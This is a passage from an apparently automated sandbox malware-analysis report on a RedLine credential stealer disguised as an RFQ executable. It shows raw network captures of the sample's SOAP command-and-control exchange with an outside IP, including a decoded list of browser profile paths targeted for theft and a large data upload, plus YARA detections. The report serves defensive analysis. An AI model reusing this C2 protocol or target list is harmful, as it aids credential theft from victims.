                                                                                      May 26, 2022 02:33:03.378009081 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378134012 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378257990 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378496885 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378699064 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378914118 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.379219055 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.439538956 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.674890041 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:03.697710037 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.065439939 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.088551044 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.091442108 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.114459991 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.114557981 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.114603996 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.114650965 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.137609005 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.137653112 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.137681007 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.137752056 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.168078899 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.378088951 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.499082088 CEST4975217910192.168.2.3185.222.58.90

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 26, 2022 02:32:39.698916912 CEST5641753192.168.2.38.8.8.8
                                                                                      May 26, 2022 02:32:39.729419947 CEST5592353192.168.2.38.8.8.8

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      May 26, 2022 02:32:39.698916912 CEST192.168.2.38.8.8.80x99Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                      May 26, 2022 02:32:39.729419947 CEST192.168.2.38.8.8.80xae6fStandard query (0)api.ip.sbA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      May 26, 2022 02:32:39.719505072 CEST8.8.8.8192.168.2.30x99No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                      May 26, 2022 02:32:39.750528097 CEST8.8.8.8192.168.2.30xae6fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • 185.222.58.90:17910

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.349740185.222.58.9017910C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 26, 2022 02:32:32.181452990 CEST1141OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                      Host: 185.222.58.90:17910
                                                                                      Content-Length: 137
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      May 26, 2022 02:32:32.205427885 CEST1141INHTTP/1.1 100 Continue
                                                                                      May 26, 2022 02:32:32.230887890 CEST1142INHTTP/1.1 200 OK
                                                                                      Content-Length: 212
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 25 May 2022 22:32:31 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                      May 26, 2022 02:32:39.199033976 CEST1214OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                      Host: 185.222.58.90:17910
                                                                                      Content-Length: 144
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      May 26, 2022 02:32:39.223392010 CEST1214INHTTP/1.1 100 Continue
                                                                                      May 26, 2022 02:32:39.278840065 CEST1216INHTTP/1.1 200 OK
                                                                                      Content-Length: 4744
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 25 May 2022 22:32:38 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.349751185.222.58.9017910C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 26, 2022 02:33:02.683155060 CEST1246OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                      Host: 185.222.58.90:17910
                                                                                      Content-Length: 1137724
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      May 26, 2022 02:33:02.707374096 CEST1246INHTTP/1.1 100 Continue
                                                                                      May 26, 2022 02:33:03.070012093 CEST2465INHTTP/1.1 200 OK
                                                                                      Content-Length: 147
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 25 May 2022 22:33:02 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.349752185.222.58.9017910C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 26, 2022 02:33:03.106812954 CEST2466OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                      Host: 185.222.58.90:17910
                                                                                      Content-Length: 1137716
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      May 26, 2022 02:33:03.129657030 CEST2466INHTTP/1.1 100 Continue
                                                                                      May 26, 2022 02:33:04.168078899 CEST3648INHTTP/1.1 200 OK
                                                                                      Content-Length: 261
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 25 May 2022 22:33:03 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:02:32:07
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe"
                                                                                      Imagebase:0x1300000
                                                                                      File size:632320 bytes
                                                                                      MD5 hash:2A348D2B6798A26F0FB552108CB870FB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:02:32:13
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      Imagebase:0x1300000
                                                                                      File size:632320 bytes
                                                                                      MD5 hash:2A348D2B6798A26F0FB552108CB870FB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.257515247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.257515247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.361370195.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.361370195.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.257103376.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.257103376.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:02:32:16
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c9170000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Reset < >